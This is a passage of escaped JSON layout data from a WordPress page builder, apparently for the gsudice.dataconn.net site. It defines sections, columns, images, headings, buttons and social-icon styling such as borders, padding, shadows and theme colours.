\"v\":\"1.1\",\"nodes\":[\"182-c78\",\"182-c84\",\"182-c90\",\"182-c96\",\"182-c102\",\"182-c108\",\"182-c113\",\"182-c119\",\"182-c125\",\"182-c131\",\"182-c143\",\"182-c137\",\"182-c231\",\"182-c237\"]},{\"id\":852,\"type\":\"hop-text\",\"v\":\"1.1\",\"nodes\":[\"182-c91\"]},{\"id\":853,\"type\":\"hop-social-icons\",\"style\":{\"descendants\":{\"icon\":{\"margin\":{\"right\":{\"value\":\"5\"}},\"padding\":{\"top\":{\"value\":\"5\"},\"left\":{\"value\":\"5\"},\"bottom\":{\"value\":\"5\"},\"right\":{\"value\":\"5\"}}},\"icon-content\":{\"width\":{\"value\":\"20\"},\"height\":{\"value\":\"20\"},\"fill\":\"${theme.colors.4|variant1}\",\"states\":{\"hover\":{\"fill\":\"${theme.colors.0}\"}}}}},\"v\":\"1.1\",\"nodes\":[\"182-c86\"]},{\"id\":854,\"type\":\"hop-image\",\"style\":{\"descendants\":{\"image\":{\"border\":{\"top\":{\"radius\":{\"left\":{\"value\":\"300\",\"unit\":\"px\"},\"right\":{\"value\":\"300\",\"unit\":\"px\"}}},\"bottom\":{\"radius\":{\"left\":{\"value\":\"300\",\"unit\":\"px\"},\"right\":{\"value\":\"300\",\"unit\":\"px\"}}}}},\"overlay\":{\"border\":{\"top\":{\"radius\":{\"left\":{\"value\":\"300\",\"unit\":\"px\"},\"right\":{\"value\":\"300\",\"unit\":\"px\"}}},\"bottom\":{\"radius\":{\"left\":{\"value\":\"300\",\"unit\":\"px\"},\"right\":{\"value\":\"300\",\"unit\":\"px\"}}}}}}},\"v\":\"1.1\",\"nodes\":[\"182-c76\",\"182-c94\",\"182-c100\",\"182-c106\",\"182-c111\",\"182-c117\",\"182-c123\",\"182-c129\",\"182-c141\",\"182-c135\",\"182-c229\",\"182-c235\"]},{\"id\":855,\"type\":\"hop-social-icons\",\"style\":{\"descendants\":{\"icon\":{\"margin\":{\"right\":{\"value\":\"5\"}},\"padding\":{\"top\":{\"value\":\"5\"},\"left\":{\"value\":\"5\"},\"bottom\":{\"value\":\"5\"},\"right\":{\"value\":\"5\"}}},\"icon-content\":{\"width\":{\"value\":\"20\"},\"height\":{\"value\":\"20\"},\"fill\":\"${theme.colors.4|variant1}\",\"states\":{\"hover\":{\"fill\":\"${theme.colors.0}\"}}}}},\"v\":\"1.1\",\"nodes\":[\"182-c80\",\"182-c98\",\"182-c104\",\"182-c115\",\"182-c121\",\"182-c127\",\"182-c133\",\"182-c145\",\"182-c139\",\"182-c233\",\"182-c239\"]},{\"id\":856,\"type\":\"hop-image\",\"style\":{\"descendants\":{\"image\":{\"border\":{\"top\":{\"radius\":{\"left\":{\"value\":\"300\",\"unit\":\"px\"},\"right\":{\"value\":\"300\",\"unit\":\"px\"}}},\"bottom\":{\"radius\":{\"left\":{\"value\":\"300\",\"unit\":\"px\"},\"right\":{\"value\":\"300\",\"unit\":\"px\"}}}}},\"overlay\":{\"border\":{\"top\":{\"radius\":{\"left\":{\"value\":\"300\",\"unit\":\"px\"},\"right\":{\"value\":\"300\",\"unit\":\"px\"}}},\"bottom\":{\"radius\":{\"left\":{\"value\":\"300\",\"unit\":\"px\"},\"right\":{\"value\":\"300\",\"unit\":\"px\"}}}}}}},\"v\":\"1.1\",\"nodes\":[\"182-c88\"]},{\"id\":857,\"type\":\"hop-social-icons\",\"style\":{\"descendants\":{\"icon\":{\"margin\":{\"right\":{\"value\":\"5\"}},\"padding\":{\"top\":{\"value\":\"5\"},\"left\":{\"value\":\"5\"},\"bottom\":{\"value\":\"5\"},\"right\":{\"value\":\"5\"}}},\"icon-content\":{\"width\":{\"value\":\"20\"},\"height\":{\"value\":\"20\"},\"fill\":\"${theme.colors.4|variant1}\",\"states\":{\"hover\":{\"fill\":\"${theme.colors.0}\"}}}}},\"v\":\"1.1\",\"nodes\":[\"182-c92\"]},{\"id\":858,\"type\":\"hop-image\",\"style\":{\"descendants\":{\"image\":{\"border\":{\"top\":{\"radius\":{\"left\":{\"value\":\"300\",\"unit\":\"px\"},\"right\":{\"value\":\"300\",\"unit\":\"px\"}}},\"bottom\":{\"radius\":{\"left\":{\"value\":\"300\",\"unit\":\"px\"},\"right\":{\"value\":\"300\",\"unit\":\"px\"}}}}},\"overlay\":{\"border\":{\"top\":{\"radius\":{\"left\":{\"value\":\"300\",\"unit\":\"px\"},\"right\":{\"value\":\"300\",\"unit\":\"px\"}}},\"bottom\":{\"radius\":{\"left\":{\"value\":\"300\",\"unit\":\"px\"},\"right\":{\"value\":\"300\",\"unit\":\"px\"}}}}}}},\"v\":\"1.1\",\"nodes\":[\"182-c293\"]},{\"id\":859,\"type\":\"hop-social-icons\",\"style\":{\"descendants\":{\"icon\":{\"margin\":{\"right\":{\"value\":\"5\"}},\"padding\":{\"top\":{\"value\":\"5\"},\"left\":{\"value\":\"5\"},\"bottom\":{\"value\":\"5\"},\"right\":{\"value\":\"5\"}}},\"icon-content\":{\"width\":{\"value\":\"20\"},\"height\":{\"value\":\"20\"},\"fill\":\"${theme.colors.4|variant1}\",\"states\":{\"hover\":{\"fill\":\"${theme.colors.0}\"}}}}},\"v\":\"1.1\",\"nodes\":[\"182-c297\"]},{\"id\":860,\"props\":{\"layout\":{\"equalWidth\":false}},\"type\":\"hop-row\",\"v\":\"1.1\",\"nodes\":[\"182-c146\"]},{\"id\":861,\"type\":\"hop-column\",\"v\":\"1.1\",\"nodes\":[\"182-c147\"]},{\"id\":862,\"props\":{\"headerType\":\"2\"},\"type\":\"hop-heading\",\"v\":\"1.1\",\"nodes\":[\"182-c148\"]},{\"id\":863,\"type\":\"hop-text\",\"props\":{\"type\":\"lead\"},\"v\":\"1.1\",\"nodes\":[\"182-c301\"]},{\"id\":864,\"type\":\"hop-button-group\",\"nodeId\":\"22-h35\",\"nodes\":[\"22-h35\"],\"v\":\"1.1\",\"style\":{\"media\":{\"mobile\":[],\"tablet\":[]}}},{\"id\":865,\"type\":\"hop-button\",\"nodeId\":\"22-h36\",\"nodes\":[\"22-h36\"],\"v\":\"1.1\",\"style\":{\"textAlign\":\"center\",\"background\":{\"color\":\"${theme.colors.0}\"},\"typography\":{\"color\":\"#fff\",\"family\":\"Open Sans\",\"margin\":{\"top\":\"\",\"bottom\":\"2rem\"},\"size\":{\"unit\":\"px\",\"value\":\"12\"},\"weight\":\"600\",\"lineHeight\":{\"value\":\"1\",\"unit\":\"\"},\"transform\":\"uppercase\",\"letterSpacing\":{\"value\":\"1\",\"unit\":\"px\"}},\"border\":{\"top\":{\"color\":\"${theme.colors.0}\",\"style\":\"solid\",\"width\":{\"value\":\"2\",\"unit\":\"px\"},\"radius\":{\"right\":{\"value\":5,\"unit\":\"px\"},\"left\":{\"value\":5,\"unit\":\"px\"}}},\"bottom\":{\"color\":\"${theme.colors.0}\",\"style\":\"solid\",\"width\":{\"value\":\"2\",\"unit\":\"px\"},\"radius\":{\"right\":{\"value\":5,\"unit\":\"px\"},\"left\":{\"value\":5,\"unit\":\"px\"}}},\"right\":{\"color\":\"${theme.colors.0}\",\"style\":\"solid\",\"width\":{\"value\":\"2\",\"unit\":\"px\"}},\"left\":{\"color\":\"${theme.colors.0}\",\"style\":\"solid\",\"width\":{\"value\":\"2\",\"unit\":\"px\"}}},\"padding\":{\"top\":{\"unit\":\"px\",\"value\":\"12\"},\"bottom\":{\"unit\":\"px\",\"value\":\"12\"},\"left\":{\"unit\":\"px\",\"value\":\"24\"},\"right\":{\"unit\":\"px\",\"value\":\"24\"}},\"states\":{\"hover\":{\"background\":{\"color\":\"${theme.colors.0|variant3}\"},\"border\":{\"top\":{\"color\":\"${theme.colors.0|variant3}\"},\"right\":{\"color\":\"${theme.colors.0|variant3}\"},\"bottom\":{\"color\":\"${theme.colors.0|variant3}\"},\"left\":{\"color\":\"${theme.colors.0|variant3}\"}}}},\"descendants\":{\"icon\":{\"size\":{\"unit\":\"px\",\"value\":\"12\"},\"margin\":{\"left\":{\"value\":\"0\",\"unit\":\"px\"},\"right\":{\"value\":\"10\",\"unit\":\"px\"}}}},\"media\":{\"mobile\":[],\"tablet\":[]}}},{\"id\":866,\"type\":\"hop-section\",\"v\":\"1.1\",\"nodes\":[\"126-c38\"],\"style\":{\"background\":{\"color\":\"#F5FAFD\"}}},{\"id\":867,\"props\":{\"layout\":{\"equalWidth\":false,\"horizontalGap\":0,\"verticalGap\":0}},\"type\":\"hop-row\",\"style\":{\"media\":{\"mobile\":{\"margin\":{\"top\":{\"value\":\"\",\"unit\":\"px\"},\"right\":{\"value\":\"15\",\"unit\":\"px\"},\"bottom\":{\"value\":\"\",\"unit\":\"px\"},\"left\":{\"value\":\"15\",\"unit\":\"px\"}}}}},\"v\":\"1.1\",\"nodes\":[\"126-c39\"]},{\"id\":868,\"type\":\"hop-column\",\"style\":{\"background\":{\"type\":\"image\",\"image\":[{\"source\":{\"type\":\"image\",\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2023\\/09\\/cropped-map1-1.jpg\"},\"size\":\"contain\",\"sizeCustom\":{\"x\":{\"value\":0}},\"position\":\"center center\",\"attachment\":\"scroll\"}]},\"boxShadow\":{\"enabled\":true,\"layers\":[{\"spread\":\"2\",\"color\":\"rgba(0, 0, 0, 0.15)\",\"blur\":\"30\",\"y\":\"10\"}]},\"zIndex\":\"1\",\"margin\":{\"top\":{\"value\":\"10\",\"unit\":\"%\"},\"right\":{\"unit\":\"%\"},\"bottom\":{\"value\":\"10\",\"unit\":\"%\"},\"left\":{\"unit\":\"%\"}},\"media\":{\"mobile\":{\"margin\":{\"top\":{\"value\":\"0\",\"unit\":\"%\"},\"right\":{\"value\":\"0\",\"unit\":\"%\"},\"bottom\":{\"value\":\"0\",\"unit\":\"%\"},\"left\":{\"value\":\"0\",\"unit\":\"%\"}},\"customHeight\":{\"type\":\"min-height\",\"min-height\":{\"value\":\"350\"}},\"transform\":{\"translate\":{\"x\":{\"value\":\"0\"},\"y\":{\"value\":\"5\"}}}},\"tablet\":{\"transform\":{\"translate\":{\"x\":{\"value\":\"5\"}}}}},\"transform\":{\"translate\":{\"x\":{\"value\":\"6\",\"unit\":\"%\"},\"y\":{\"value\":0,\"unit\":\"%\"}}},\"border\":{\"top\":{\"radius\":{\"left\":{\"value\":\"5\",\"unit\":\"px\"},\"right\":{\"value\":\"5\",\"unit\":\"px\"}}},\"bottom\":{\"radius\":{\"left\":{\"value\":\"5\",\"unit\":\"px\"},\"right\":{\"value\":\"5\",\"unit\":\"px\"}}}}},\"props\":{\"layout\":{\"horizontalInnerGap\":0,\"verticalInnerGap\":0}},\"v\":\"1.1\",\"nodes\":[\"126-c40\"]},{\"id\":869,\"type\":\"hop-column\",\"style\":{\"textAlign\":\"left\",\"background\":{\"color\":\"${theme.colors.4}\"},\"padding\":{\"top\":{\"value\":\"15\",\"unit\":\"%\"},\"right\":{\"value\":\"20\",\"unit\":\"%\"},\"bottom\":{\"value\":\"15\",\"unit\":\"%\"},\"left\":{\"value\":\"20\",\"unit\":\"%\"}},\"media\":{\"mobile\":{\"margin\":{\"top\":{\"value\":\"0\",\"unit\":\"%\"},\"right\":{\"value\":\"0\",\"unit\":\"%\"},\"bottom\":{\"value\":\"0\",\"unit\":\"%\"},\"left\":{\"value\":\"0\",\"unit\":\"%\"}},\"textAlign\":\"center\",\"padding\":{\"top\":{\"value\":\"10\",\"unit\":\"%\"},\"right\":{\"value\":\"10\",\"unit\":\"%\"},\"bottom\":{\"value\":\"10\",\"unit\":\"%\"},\"left\":{\"value\":\"10\",\"unit\":\"%\"}},\"transform\":{\"translate\":{\"x\":{\"value\":\"0\"}}}},\"tablet\":{\"padding\":{\"top\":{\"value\":\"10\",\"unit\":\"%\"},\"right\":{\"value\":\"15\",\"unit\":\"%\"},\"bottom\":{\"value\":\"10\",\"unit\":\"%\"},\"left\":{\"value\":\"15\",\"unit\":\"%\"}},\"transform\":{\"translate\":{\"x\":{\"value\":\"-5\"}}}}},\"transform\":{\"translate\":{\"x\":{\"value\":\"-6\",\"unit\":\"%\"},\"y\":{\"value\":0,\"unit\":\"%\"}}},\"boxShadow\":{\"enabled\":true,\"layers\":[{\"color\":\"rgba(0, 0, 0, 0.15)\",\"blur\":\"15\",\"y\":\"5\"}]},\"border\":{\"top\":{\"radius\":{\"left\":{\"value\":\"5\",\"unit\":\"px\"},\"right\":{\"value\":\"5\",\"unit\":\"px\"}}},\"bottom\":{\"radius\":{\"left\":{\"value\":\"5\",\"unit\":\"px\"},\"right\":{\"value\":\"5\",\"unit\":\"px\"}}}}},\"v\":\"1.1\",\"nodes\":[\"126-c41\"]},{\"id\":872,\"type\":\"hop-text\",\"v\":\"1.1\",\"nodes\":[\"126-c44\"]},{\"id\":873,\"type\":\"hop-section\",\"v\":\"1.1\",\"nodes\":[\"126-c45\"],\"style\":{\"background\":{\"color\":\"#F5FAFD\"}}},{\"id\":874,\"props\":{\"layout\":{\"equalWidth\":false,\"verticalGap\":0,\"horizontalGap\":0}},\"type\":\"hop-row\",\"style\":{\"media\":{\"mobile\":{\"margin\":{\"top\":{\"value\":\"\",\"unit\":\"px\"},\"right\":{\"value\":\"15\",\"unit\":\"px\"},\"bottom\":{\"value\":\"\",\"unit\":\"px\"},\"left\":{\"value\":\"15\",\"unit\":\"px\"}}}}},\"v\":\"1.1\",\"nodes\":[\"126-c46\"]},{\"id\":875,\"type\":\"hop-column\",\"style\":{\"background\":{\"color\":\"${theme.colors.4}\"},\"textAlign\":\"left\",\"padding\":{\"top\":{\"value\":\"15\",\"unit\":\"%\"},\"right\":{\"value\":\"20\",\"unit\":\"%\"},\"bottom\":{\"value\":\"15\",\"unit\":\"%\"},\"left\":{\"value\":\"20\",\"unit\":\"%\"}},\"media\":{\"mobile\":{\"padding\":{\"top\":{\"value\":\"10\",\"unit\":\"%\"},\"right\":{\"value\":\"10\",\"unit\":\"%\"},\"bottom\":{\"value\":\"10\",\"unit\":\"%\"},\"left\":{\"value\":\"10\",\"unit\":\"%\"}},\"margin\":{\"top\":{\"unit\":\"%\"},\"right\":{\"unit\":\"%\"},\"bottom\":{\"unit\":\"%\"},\"left\":{\"value\":\"0\",\"unit\":\"%\"}},\"textAlign\":\"center\",\"transform\":{\"translate\":{\"x\":{\"value\":\"0\"}}}},\"tablet\":{\"padding\":{\"top\":{\"value\":\"10\",\"unit\":\"%\"},\"right\":{\"value\":\"15\",\"unit\":\"%\"},\"bottom\":{\"value\":\"10\",\"unit\":\"%\"},\"left\":{\"value\":\"15\",\"unit\":\"%\"}},\"transform\":{\"translate\":{\"x\":{\"value\":\"5\"}}}}},\"transform\":{\"translate\":{\"x\":{\"value\":\"6\",\"unit\":\"%\"},\"y\":{\"value\":0,\"unit\":\"%\"}}},\"border\":{\"top\":{\"radius\":{\"left\":{\"value\":\"5\",\"unit\":\"px\"},\"right\":{\"value\":\"5\",\"unit\":\"px\"}}},\"bottom\":{\"radius\":{\"left\":{\"value\":\"5\",\"unit\":\"px\"},\"right\":{\"value\":\"5\",\"unit\":\"px\"}}}},\"boxShadow\":{\"enabled\":true,\"layers\":[{\"color\":\"rgba(0, 0, 0, 0.15)\",\"blur\":\"15\",\"y\":\"5\"}]}},\"props\":{\"layout\":{\"horizontalInnerGap\":0,\"verticalInnerGap\":0}},\"v\":\"1.1\",\"nodes\":[\"126-c47\"]},{\"id\":876,\"type\":\"hop-heading\",\"props\":{\"headerType\":\"5\"},\"v\":\"1.1\",\"nodes\":[\"126-c48\"]},{\"id\":878,\"type\":\"hop-text\",\"v\":\"1.1\",\"nodes\":[\"126-c50\"]},{\"id\":879,\"type\":\"hop-column\",\"style\":{\"background\":{\"type\":\"image\",\"image\":[{\"source\":{\"type\":\"image\",\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/02\\/cropped-kevin-ku-w7ZyuGYNpRQ-unsplash-scaled-1.jpg\"},\"position\":\"center center\"}]},\"boxShadow\":{\"enabled\":true,\"layers\":[{\"spread\":\"2\",\"color\":\"rgba(0, 0, 0, 0.15)\",\"y\":\"10\",\"blur\":\"30\"}]},\"media\":{\"mobile\":{\"customHeight\":{\"type\":\"min-height\",\"min-height\":{\"value\":\"350\"}},\"margin\":{\"top\":{\"value\":\"0\",\"unit\":\"%\"},\"right\":{\"value\":\"0\",\"unit\":\"%\"},\"bottom\":{\"value\":\"0\",\"unit\":\"%\"},\"left\":{\"value\":\"0\",\"unit\":\"%\"}},\"transform\":{\"translate\":{\"x\":{\"value\":\"0\"},\"y\":{\"value\":\"-5\"}}}},\"tablet\":{\"transform\":{\"translate\":{\"x\":{\"value\":\"-5\"}}}}},\"margin\":{\"top\":{\"value\":\"10\",\"unit\":\"%\"},\"right\":{\"unit\":\"%\"},\"bottom\":{\"value\":\"10\",\"unit\":\"%\"},\"left\":{\"unit\":\"%\"}},\"transform\":{\"translate\":{\"x\":{\"value\":\"-6\",\"unit\":\"%\"},\"y\":{\"value\":0,\"unit\":\"%\"}}},\"border\":{\"top\":{\"radius\":{\"left\":{\"value\":\"5\",\"unit\":\"px\"},\"right\":{\"value\":\"5\",\"unit\":\"px\"}}},\"bottom\":{\"radius\":{\"left\":{\"value\":\"5\",\"unit\":\"px\"},\"right\":{\"value\":\"5\",\"unit\":\"px\"}}}}},\"v\":\"1.1\",\"nodes\":[\"126-c51\"]},{\"id\":880,\"type\":\"hop-content\",\"nodeId\":\"1573-c1\",\"nodes\":[\"1573-c1\"],\"v\":\"1.1\"},{\"id\":881,\"type\":\"hop-section\",\"nodeId\":\"1573-c2\",\"nodes\":[\"1573-c2\"],\"v\":\"1.1\",\"style\":{\"background\":{\"color\":\"#F5FAFD\"}}},{\"id\":882,\"props\":{\"layout\":{\"equalWidth\":false}},\"type\":\"hop-row\",\"nodeId\":\"1573-c3\",\"nodes\":[\"1573-c3\"],\"v\":\"1.1\"},{\"id\":883,\"type\":\"hop-column\",\"nodeId\":\"1573-c4\",\"nodes\":[\"1573-c4\"],\"v\":\"1.1\"},{\"id\":893,\"type\":\"hop-text\",\"nodeId\":\"1573-c14\",\"nodes\":[\"1573-c5\"],\"v\":\"1.1\",\"style\":{\"textAlign\":\"left\",\"typography\":{\"holders\":{\"p\":{\"color\":\"${theme.colors.0}\",\"size\":{\"unit\":\"px\",\"value\":\"16\"}}}}}},{\"id\":901,\"type\":\"hop-text\",\"nodeId\":\"182-c245\",\"nodes\":[\"182-c85\"],\"v\":\"1.1\"},{\"id\":902,\"type\":\"hop-text\",\"nodeId\":\"182-c246\",\"nodes\":[\"182-c79\",\"182-c97\",\"182-c103\",\"182-c109\",\"182-c114\",\"182-c120\",\"182-c126\",\"182-c132\",\"182-c144\",\"182-c138\",\"182-c232\",\"182-c238\"],\"v\":\"1.1\"},{\"id\":910,\"type\":\"hop-section\",\"props\":{\"showHeader\":true},\"v\":\"1.1\",\"nodes\":[\"182-c159\"],\"style\":{\"background\":{\"color\":\"#F5FAFD\"}}},{\"id\":911,\"props\":{\"layout\":{\"equalWidth\":true,\"itemsPerRow\":4},\"media\":{\"tablet\":{\"layout\":{\"itemsPerRow\":2}}}},\"type\":\"hop-row\",\"v\":\"1.1\",\"nodes\":[\"182-c160\"]},{\"id\":912,\"type\":\"hop-column\",\"props\":{\"layout\":{\"vSpace\":{\"path\":\"value\",\"value\":\"10\"},\"verticalInnerGap\":0,\"horizontalInnerGap\":0}},\"v\":\"1.1\",\"nodes\":[\"182-c161\",\"182-c166\",\"182-c171\",\"182-c176\",\"182-c181\",\"182-c186\",\"182-c191\",\"182-c196\",\"182-c200\",\"182-c205\",\"182-c210\",\"182-c215\",\"182-c220\"]},{\"id\":913,\"type\":\"hop-image\",\"style\":{\"descendants\":{\"image\":{\"border\":{\"top\":{\"radius\":{\"left\":{\"value\":\"300\",\"unit\":\"px\"},\"right\":{\"value\":\"300\",\"unit\":\"px\"}}},\"bottom\":{\"radius\":{\"left\":{\"value\":\"300\",\"unit\":\"px\"},\"right\":{\"value\":\"300\",\"unit\":\"px\"}}}}},\"overlay\":{\"border\":{\"top\":{\"radius\":{\"left\":{\"value\":\"300\",\"unit\":\"px\"},\"right\":{\"value\":\"300\",\"unit\":\"px\"}}},\"bottom\":{\"radius\":{\"left\":{\"value\":\"300\",\"unit\":\"px\"},\"right\":{\"value\":\"300\",\"unit\":\"px\"}}}}}}},\"v\":\"1.1\",\"nodes\":[\"182-c162\",\"182-c182\",\"182-c187\",\"182-c192\",\"182-c197\",\"182-c201\",\"182-c206\",\"182-c211\",\"182-c216\",\"182-c221\"]},{\"id\":914,\"type\":\"hop-heading\",\"props\":{\"headerType\":\"4\"},\"v\":\"1.1\",\"nodes\":[\"182-c163\",\"182-c168\",\"182-c173\",\"182-c178\",\"182-c183\",\"182-c188\",\"182-c193\",\"182-c198\",\"182-c202\",\"182-c207\",\"182-c212\",\"182-c217\",\"182-c222\"]},{\"id\":915,\"type\":\"hop-text\",\"style\":{\"typography\":{\"holders\":{\"p\":{\"style\":\"italic\"}}},\"media\":{\"desktop\":{\"typography\":{\"holders\":{\"p\":{\"style\":\"italic\"}}}}}},\"v\":\"1.1\",\"nodes\":[\"182-c164\",\"182-c169\",\"182-c174\",\"182-c179\",\"182-c184\",\"182-c189\",\"182-c194\",\"182-c199\",\"182-c203\",\"182-c208\",\"182-c213\",\"182-c218\",\"182-c223\"]},{\"id\":917,\"type\":\"hop-social-icons\",\"style\":{\"descendants\":{\"icon\":{\"margin\":{\"right\":{\"value\":\"5\"}},\"padding\":{\"top\":{\"value\":\"5\"},\"left\":{\"value\":\"5\"},\"bottom\":{\"value\":\"5\"},\"right\":{\"value\":\"5\"}}},\"icon-content\":{\"width\":{\"value\":\"20\"},\"height\":{\"value\":\"20\"},\"fill\":\"${theme.colors.4|variant1}\",\"states\":{\"hover\":{\"fill\":\"${theme.colors.0}\"}}}}},\"v\":\"1.1\",\"nodes\":[\"182-c165\",\"182-c185\",\"182-c190\",\"182-c195\",\"182-c204\",\"182-c209\",\"182-c214\",\"182-c219\",\"182-c224\"]},{\"id\":918,\"type\":\"hop-image\",\"style\":{\"descendants\":{\"image\":{\"border\":{\"top\":{\"radius\":{\"left\":{\"value\":\"300\",\"unit\":\"px\"},\"right\":{\"value\":\"300\",\"unit\":\"px\"}}},\"bottom\":{\"radius\":{\"left\":{\"value\":\"300\",\"unit\":\"px\"},\"right\":{\"value\":\"300\",\"unit\":\"px\"}}}}},\"overlay\":{\"border\":{\"top\":{\"radius\":{\"left\":{\"value\":\"300\",\"unit\":\"px\"},\"right\":{\"value\":\"300\",\"unit\":\"px\"}}},\"bottom\":{\"radius\":{\"left\":{\"value\":\"300\",\"unit\":\"px\"},\"right\":{\"value\":\"300\",\"unit\":\"px\"}}}}}}},\"v\":\"1.1\",\"nodes\":[\"182-c167\"]},{\"id\":919,\"type\":\"hop-social-icons\",\"style\":{\"descendants\":{\"icon\":{\"margin\":{\"right\":{\"value\":\"5\"}},\"padding\":{\"top\":{\"value\":\"5\"},\"left\":{\"value\":\"5\"},\"bottom\":{\"value\":\"5\"},\"right\":{\"value\":\"5\"}}},\"icon-content\":{\"width\":{\"value\":\"20\"},\"height\":{\"value\":\"20\"},\"fill\":\"${theme.colors.4|variant1}\",\"states\":{\"hover\":{\"fill\":\"${theme.colors.0}\"}}}}},\"v\":\"1.1\",\"nodes\":[\"182-c170\"]},{\"id\":920,\"type\":\"hop-image\",\"style\":{\"descendants\":{\"image\":{\"border\":{\"top\":{\"radius\":{\"left\":{\"value\":\"300\",\"unit\":\"px\"},\"right\":{\"value\":\"300\",\"unit\":\"px\"}}},\"bottom\":{\"radius\":{\"left\":{\"value\":\"300\",\"unit\":\"px\"},\"right\":{\"value\":\"300\",\"unit\":\"px\"}}}}},\"overlay\":{\"border\":{\"top\":{\"radius\":{\"left\":{\"value\":\"300\",\"unit\":\"px\"},\"right\":{\"value\":\"300\",\"unit\":\"px\"}}},\"bottom\":{\"radius\":{\"left\":{\"value\":\"300\",\"unit\":\"px\"},\"right\":{\"value\":\"300\",\"unit\":\"px\"}}}}}}},\"v\":\"1.1\",\"nodes\":[\"182-c172\"]},{\"id\":921,\"type\":\"hop-social-icons\",\"style\":{\"descendants\":{\"icon\":{\"margin\":{\"right\":{\"value\":\"5\"}},\"padding\":{\"top\":{\"value\":\"5\"},\"left\":{\"value\":\"5\"},\"bottom\":{\"value\":\"5\"},\"right\":{\"value\":\"5\"}}},\"icon-content\":{\"width\":{\"value\":\"20\"},\"height\":{\"value\":\"20\"},\"fill\":\"${theme.colors.4|variant1}\",\"states\":{\"hover\":{\"fill\":\"${theme.colors.0}\"}}}}},\"v\":\"1.1\",\"nodes\":[\"182-c175\"]},{\"id\":922,\"type\":\"hop-image\",\"style\":{\"descendants\":{\"image\":{\"border\":{\"top\":{\"radius\":{\"left\":{\"value\":\"300\",\"unit\":\"px\"},\"right\":{\"value\":\"300\",\"unit\":\"px\"}}},\"bottom\":{\"radius\":{\"left\":{\"value\":\"300\",\"unit\":\"px\"},\"right\":{\"value\":\"300\",\"unit\":\"px\"}}}}},\"overlay\":{\"border\":{\"top\":{\"radius\":{\"left\":{\"value\":\"300\",\"unit\":\"px\"},\"right\":{\"value\":\"300\",\"unit\":\"px\"}}},\"bottom\":{\"radius\":{\"left\":{\"value\":\"300\",\"unit\":\"px\"},\"right\":{\"value\":\"300\",\"unit\":\"px\"}}}}}}},\"v\":\"1.1\",\"nodes\":[\"182-c177\"]},{\"id\":923,\"type\":\"hop-social-icons\",\"style\":{\"descendants\":{\"icon\":{\"margin\":{\"right\":{\"value\":\"5\"}},\"padding\":{\"top\":{\"value\":\"5\"},\"left\":{\"value\":\"5\"},\"bottom\":{\"value\":\"5\"},\"right\":{\"value\":\"5\"}}},\"icon-content\":{\"width\":{\"value\":\"20\"},\"height\":{\"value\":\"20\"},\"fill\":\"${theme.colors.4|variant1}\",\"states\":{\"hover\":{\"fill\":\"${theme.colors.0}\"}}}}},\"v\":\"1.1\",\"nodes\":[\"182-c180\"]},{\"id\":924,\"props\":{\"layout\":{\"equalWidth\":false}},\"type\":\"hop-row\",\"v\":\"1.1\",\"nodes\":[\"182-c225\"]},{\"id\":925,\"type\":\"hop-column\",\"v\":\"1.1\",\"nodes\":[\"182-c226\"]},{\"id\":926,\"props\":{\"headerType\":\"2\"},\"type\":\"hop-heading\",\"v\":\"1.1\",\"nodes\":[\"182-c227\"]},{\"id\":970,\"type\":\"hop-section\",\"props\":{\"showHeader\":true},\"v\":\"1.1\",\"nodes\":[\"182-c2\"]},{\"id\":971,\"props\":{\"layout\":{\"equalWidth\":true,\"itemsPerRow\":4},\"media\":{\"tablet\":{\"layout\":{\"itemsPerRow\":2}}}},\"type\":\"hop-row\",\"v\":\"1.1\",\"nodes\":[\"182-c3\"]},{\"id\":972,\"type\":\"hop-column\",\"props\":{\"layout\":{\"vSpace\":{\"path\":\"value\",\"value\":\"10\"},\"verticalInnerGap\":0,\"horizontalInnerGap\":0}},\"v\":\"1.1\",\"nodes\":[\"182-c4\",\"182-c10\",\"182-c16\",\"182-c22\",\"182-c28\",\"182-c34\",\"182-c40\",\"182-c46\",\"182-c52\",\"182-c58\",\"182-c64\"]},{\"id\":973,\"type\":\"hop-image\",\"style\":{\"descendants\":{\"image\":{\"border\":{\"top\":{\"radius\":{\"left\":{\"value\":\"300\",\"unit\":\"px\"},\"right\":{\"value\":\"300\",\"unit\":\"px\"}}},\"bottom\":{\"radius\":{\"left\":{\"value\":\"300\",\"unit\":\"px\"},\"right\":{\"value\":\"300\",\"unit\":\"px\"}}}}},\"overlay\":{\"border\":{\"top\":{\"radius\":{\"left\":{\"value\":\"300\",\"unit\":\"px\"},\"right\":{\"value\":\"300\",\"unit\":\"px\"}}},\"bottom\":{\"radius\":{\"left\":{\"value\":\"300\",\"unit\":\"px\"},\"right\":{\"value\":\"300\",\"unit\":\"px\"}}}}}}},\"v\":\"1.1\",\"nodes\":[\"182-c5\",\"182-c29\",\"182-c35\",\"182-c41\",\"182-c47\",\"182-c53\",\"182-c59\",\"182-c65\"]},{\"id\":974,\"type\":\"hop-heading\",\"props\":{\"headerType\":\"4\"},\"v\":\"1.1\",\"nodes\":[\"182-c6\",\"182-c12\",\"182-c18\",\"182-c24\",\"182-c30\",\"182-c36\",\"182-c42\",\"182-c48\",\"182-c54\",\"182-c60\",\"182-c66\"]},{\"id\":975,\"type\":\"hop-text\",\"style\":{\"typography\":{\"holders\":{\"p\":{\"style\":\"italic\"}}},\"media\":{\"desktop\":{\"typography\":{\"holders\":{\"p\":{\"style\":\"italic\"}}}}}},\"v\":\"1.1\",\"nodes\":[\"182-c7\",\"182-c13\",\"182-c19\",\"182-c25\",\"182-c31\",\"182-c37\",\"182-c43\",\"182-c49\",\"182-c55\",\"182-c61\",\"182-c67\"]},{\"id\":976,\"type\":\"hop-text\",\"v\":\"1.1\",\"nodes\":[\"182-c8\",\"182-c14\",\"182-c20\",\"182-c26\",\"182-c32\",\"182-c38\",\"182-c44\",\"182-c50\",\"182-c56\",\"182-c62\",\"182-c68\"]},{\"id\":977,\"type\":\"hop-social-icons\",\"style\":{\"descendants\":{\"icon\":{\"margin\":{\"right\":{\"value\":\"5\"}},\"padding\":{\"top\":{\"value\":\"5\"},\"left\":{\"value\":\"5\"},\"bottom\":{\"value\":\"5\"},\"right\":{\"value\":\"5\"}}},\"icon-content\":{\"width\":{\"value\":\"20\"},\"height\":{\"value\":\"20\"},\"fill\":\"${theme.colors.4|variant1}\",\"states\":{\"hover\":{\"fill\":\"${theme.colors.0}\"}}}}},\"v\":\"1.1\",\"nodes\":[\"182-c9\",\"182-c33\",\"182-c39\",\"182-c45\",\"182-c51\",\"182-c57\",\"182-c63\",\"182-c69\"]},{